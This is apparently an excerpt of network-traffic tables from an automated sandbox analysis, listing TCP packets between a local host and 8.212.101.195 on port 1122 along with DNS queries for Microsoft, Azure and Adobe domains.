                                                                                                                      Dec 29, 2024 13:40:40.664767981 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.664822102 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.668848991 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.668943882 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.669042110 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.673001051 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.673090935 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.673166990 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.677211046 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.677320004 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.677366018 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.681442022 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.681452990 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.681524992 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.685642004 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.685751915 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.686367989 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.689837933 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.689966917 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.690006018 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.694072008 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.694169044 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.694246054 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.698306084 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.698316097 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.698373079 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.702475071 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.702596903 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.702692986 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.706669092 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.706795931 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.706860065 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.710897923 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.711024046 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.711076975 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.715104103 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.715269089 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.715332031 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.719403982 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.719450951 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.719567060 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.810611963 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.810677052 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.811085939 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.812083960 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.812694073 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.812767029 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.812820911 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.815627098 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.815740108 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.815804005 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.818685055 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.818790913 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.818850040 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.821588993 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.821659088 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.821721077 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.824462891 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.824568033 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.824640989 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.827333927 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.827383995 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.827456951 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.830187082 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.830245018 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.830280066 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.832948923 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.833018064 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.833050966 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.835716963 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.835838079 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.835881948 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.838495016 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.838632107 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.838702917 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.841217041 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.841339111 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.841398001 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.843890905 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.843964100 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.844022989 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.846544981 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.846597910 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.846632004 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.849160910 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.849221945 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.849296093 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.851783991 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.851886988 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.851950884 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.854402065 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.854494095 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.854557037 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.856965065 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.857084036 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.857141018 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.859602928 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.859714031 CET1122499058.212.101.195192.168.2.4
                                                                                                                      Dec 29, 2024 13:40:40.859770060 CET499051122192.168.2.48.212.101.195
                                                                                                                      Dec 29, 2024 13:40:40.862217903 CET1122499058.212.101.195192.168.2.4
Dec 29, 2024 13:40:40.862289906 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.862330914 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.864866018 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.864917994 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.864937067 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.867456913 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.867500067 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.867563963 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.870081902 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.870135069 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.870194912 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.872750044 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.872869968 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.872919083 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.875327110 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.875387907 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.875472069 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.877921104 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.877985001 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.878020048 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.880570889 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.880669117 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.880676985 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.883176088 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.883300066 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.883330107 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.885797977 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.885925055 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.885973930 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.888442993 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.888495922 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.888549089 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.891087055 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.891134024 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.891136885 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.893661022 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.893723011 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.893757105 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.896266937 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.896318913 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.896370888 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.898893118 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.898964882 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.899000883 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.901540995 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.901586056 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.901648045 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.904119968 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.904182911 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.904242992 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.906732082 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.906784058 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.906847000 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.909379005 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.909427881 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.909483910 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.912055969 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.912106037 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.912139893 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.914598942 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.914645910 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.914705038 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.917252064 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.917300940 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.917361021 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.919837952 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.919884920 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.919939041 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.922512054 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.922559023 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.922646046 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.925062895 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.925112009 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.925179005 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.927706957 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.927757978 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.927812099 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.930350065 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.930401087 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.930527925 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.932962894 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.933029890 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.933062077 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.935556889 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.935611963 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.935658932 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.938144922 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.938195944 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:40.938254118 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.940798044 CET  1122   49905  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:40.940856934 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:41.964510918 CET  49943  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:42.088181973 CET  1122   49943  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:42.088242054 CET  49943  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:44.007891893 CET  49905  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:47.461294889 CET  49943  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:47.582211018 CET  1122   49943  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:47.582386017 CET  1122   49943  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:47.582397938 CET  1122   49943  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:47.582410097 CET  1122   49943  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:48.017014027 CET  1122   49943  8.212.101.195    192.168.2.4
Dec 29, 2024 13:40:48.017308950 CET  49943  1122   192.168.2.4      8.212.101.195
Dec 29, 2024 13:40:48.138457060 CET  1122   49943  8.212.101.195    192.168.2.4
Dec 29, 2024 13:41:04.605287075 CET  50227  443    192.168.2.4      108.139.79.18
Dec 29, 2024 13:41:04.605300903 CET  443    50227  108.139.79.18    192.168.2.4
Dec 29, 2024 13:41:04.605395079 CET  50227  443    192.168.2.4      108.139.79.18
Dec 29, 2024 13:41:04.608171940 CET  50227  443    192.168.2.4      108.139.79.18
Dec 29, 2024 13:41:04.608181000 CET  443    50227  108.139.79.18    192.168.2.4
Dec 29, 2024 13:41:05.909897089 CET  49813  443    192.168.2.4      152.199.21.175
Dec 29, 2024 13:41:05.909913063 CET  443    49813  152.199.21.175   192.168.2.4
Dec 29, 2024 13:41:06.260765076 CET  443    50227  108.139.79.18    192.168.2.4
Dec 29, 2024 13:41:06.261080027 CET  50227  443    192.168.2.4      108.139.79.18
Dec 29, 2024 13:41:06.261089087 CET  443    50227  108.139.79.18    192.168.2.4
Dec 29, 2024 13:41:06.262137890 CET  443    50227  108.139.79.18    192.168.2.4
Dec 29, 2024 13:41:06.262198925 CET  50227  443    192.168.2.4      108.139.79.18
Dec 29, 2024 13:41:06.263479948 CET  50227  443    192.168.2.4      108.139.79.18
Dec 29, 2024 13:41:06.263545036 CET  443    50227  108.139.79.18    192.168.2.4
Dec 29, 2024 13:41:06.263688087 CET  50227  443    192.168.2.4      108.139.79.18
Dec 29, 2024 13:41:06.263695002 CET  443    50227  108.139.79.18    192.168.2.4
Dec 29, 2024 13:41:06.319468975 CET  50227  443    192.168.2.4      108.139.79.18
Dec 29, 2024 13:41:07.123626947 CET  443    50227  108.139.79.18    192.168.2.4
Dec 29, 2024 13:41:07.123701096 CET  443    50227  108.139.79.18    192.168.2.4
Dec 29, 2024 13:41:07.123754025 CET  50227  443    192.168.2.4      108.139.79.18
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 29, 2024 13:39:20.393035889 CET  138          138        192.168.2.4      192.168.2.255
Dec 29, 2024 13:40:08.679943085 CET  53           51429      1.1.1.1          192.168.2.4
Dec 29, 2024 13:40:08.691883087 CET  53           62576      1.1.1.1          192.168.2.4
Dec 29, 2024 13:40:11.478933096 CET  53           56380      1.1.1.1          192.168.2.4
Dec 29, 2024 13:40:12.315702915 CET  56985        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:12.315853119 CET  54711        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:12.453666925 CET  53           54711      1.1.1.1          192.168.2.4
Dec 29, 2024 13:40:12.453789949 CET  53           56985      1.1.1.1          192.168.2.4
Dec 29, 2024 13:40:18.436103106 CET  57306        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:18.436228037 CET  60627        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:18.580466986 CET  62672        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:18.580635071 CET  58292        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:18.691812038 CET  52730        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:18.691948891 CET  52864        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:18.833965063 CET  50724        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:18.834096909 CET  63363        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:18.958101034 CET  50466        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:18.958225012 CET  64268        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:18.972379923 CET  53           50724      1.1.1.1          192.168.2.4
Dec 29, 2024 13:40:18.972876072 CET  53           63363      1.1.1.1          192.168.2.4
Dec 29, 2024 13:40:28.508730888 CET  53           53453      1.1.1.1          192.168.2.4
Dec 29, 2024 13:40:37.345062017 CET  53365        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:37.345211029 CET  58695        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:42.746143103 CET  62177        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:42.746326923 CET  49208        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:44.692158937 CET  61282        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:44.692372084 CET  61446        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:44.793661118 CET  56671        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:44.793852091 CET  59677        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:47.195421934 CET  53           59756      1.1.1.1          192.168.2.4
Dec 29, 2024 13:40:47.572185040 CET  55727        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:47.572314024 CET  54035        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:48.371679068 CET  53           54173      1.1.1.1          192.168.2.4
Dec 29, 2024 13:40:49.882291079 CET  56312        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:49.882333040 CET  51265        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:53.098918915 CET  56993        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:53.099040031 CET  64259        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:40:53.237669945 CET  53           56993      1.1.1.1          192.168.2.4
Dec 29, 2024 13:40:53.237771988 CET  53           64259      1.1.1.1          192.168.2.4
Dec 29, 2024 13:41:04.453057051 CET  52457        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:41:04.453208923 CET  61972        53         192.168.2.4      1.1.1.1
Dec 29, 2024 13:41:04.591890097 CET  53           61972      1.1.1.1          192.168.2.4
Dec 29, 2024 13:41:04.595151901 CET  53           52457      1.1.1.1          192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                        Type            Class        DNS over HTTPS
Dec 29, 2024 13:40:12.315702915 CET  192.168.2.4  1.1.1.1  0x3f5a    Standard query (0)  www.google.com              A (IP address)  IN (0x0001)  false
Dec 29, 2024 13:40:12.315853119 CET  192.168.2.4  1.1.1.1  0x82f4    Standard query (0)  www.google.com              65              IN (0x0001)  false
Dec 29, 2024 13:40:18.436103106 CET  192.168.2.4  1.1.1.1  0x7448    Standard query (0)  support.content.office.net  A (IP address)  IN (0x0001)  false
Dec 29, 2024 13:40:18.436228037 CET  192.168.2.4  1.1.1.1  0x8b63    Standard query (0)  support.content.office.net  65              IN (0x0001)  false
Dec 29, 2024 13:40:18.580466986 CET  192.168.2.4  1.1.1.1  0xfe61    Standard query (0)  c.s-microsoft.com           A (IP address)  IN (0x0001)  false
Dec 29, 2024 13:40:18.580635071 CET  192.168.2.4  1.1.1.1  0x6414    Standard query (0)  c.s-microsoft.com           65              IN (0x0001)  false
Dec 29, 2024 13:40:18.691812038 CET  192.168.2.4  1.1.1.1  0x359f    Standard query (0)  js.monitor.azure.com        A (IP address)  IN (0x0001)  false
Dec 29, 2024 13:40:18.691948891 CET  192.168.2.4  1.1.1.1  0x8155    Standard query (0)  js.monitor.azure.com        65              IN (0x0001)  false
Dec 29, 2024 13:40:18.833965063 CET  192.168.2.4  1.1.1.1  0xaeee    Standard query (0)  aadcdn.msftauth.net         A (IP address)  IN (0x0001)  false
Dec 29, 2024 13:40:18.834096909 CET  192.168.2.4  1.1.1.1  0x2b06    Standard query (0)  aadcdn.msftauth.net         65              IN (0x0001)  false
Dec 29, 2024 13:40:18.958101034 CET  192.168.2.4  1.1.1.1  0x87fd    Standard query (0)  mem.gfx.ms                  A (IP address)  IN (0x0001)  false
Dec 29, 2024 13:40:18.958225012 CET  192.168.2.4  1.1.1.1  0x64db    Standard query (0)  mem.gfx.ms                  65              IN (0x0001)  false
Dec 29, 2024 13:40:37.345062017 CET  192.168.2.4  1.1.1.1  0x6895    Standard query (0)  support.content.office.net  A (IP address)  IN (0x0001)  false
Dec 29, 2024 13:40:37.345211029 CET  192.168.2.4  1.1.1.1  0xce19    Standard query (0)  support.content.office.net  65              IN (0x0001)  false
Dec 29, 2024 13:40:42.746143103 CET  192.168.2.4  1.1.1.1  0xe2b0    Standard query (0)  mem.gfx.ms                  A (IP address)  IN (0x0001)  false
Dec 29, 2024 13:40:42.746326923 CET  192.168.2.4  1.1.1.1  0xce2d    Standard query (0)  mem.gfx.ms                  65              IN (0x0001)  false
Dec 29, 2024 13:40:44.692158937 CET  192.168.2.4  1.1.1.1  0x4c01    Standard query (0)  login.microsoftonline.com   A (IP address)  IN (0x0001)  false
Dec 29, 2024 13:40:44.692372084 CET  192.168.2.4  1.1.1.1  0x8215    Standard query (0)  login.microsoftonline.com   65              IN (0x0001)  false
Dec 29, 2024 13:40:44.793661118 CET  192.168.2.4  1.1.1.1  0x5111    Standard query (0)  assets.adobedtm.com         A (IP address)  IN (0x0001)  false
Dec 29, 2024 13:40:44.793852091 CET  192.168.2.4  1.1.1.1  0x435f    Standard query (0)  assets.adobedtm.com         65              IN (0x0001)  false
Dec 29, 2024 13:40:47.572185040 CET  192.168.2.4  1.1.1.1  0xca8e    Standard query (0)  assets.adobedtm.com         A (IP address)  IN (0x0001)  false
Dec 29, 2024 13:40:47.572314024 CET  192.168.2.4  1.1.1.1  0x3842    Standard query (0)  assets.adobedtm.com         65              IN (0x0001)  false
                                                                                                                      Dec 29, 2024 13:40:49.882291079 CET192.168.2.41.1.1.10x6817Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:49.882333040 CET192.168.2.41.1.1.10x88cbStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:53.098918915 CET192.168.2.41.1.1.10xfbd3Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:53.099040031 CET192.168.2.41.1.1.10x83dfStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.453057051 CET192.168.2.41.1.1.10x1819Standard query (0)api.company-target.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:04.453208923 CET192.168.2.41.1.1.10x2f54Standard query (0)api.company-target.com65IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                      Dec 29, 2024 13:40:59.737623930 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:40:59.737623930 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:01.753962994 CET1.1.1.1192.168.2.40x2f02No error (0)edge.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 29, 2024 13:41:01.753962994 CET1.1.1.1192.168.2.40x2f02No error (0)default.qdr.p1.ds-c7109-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
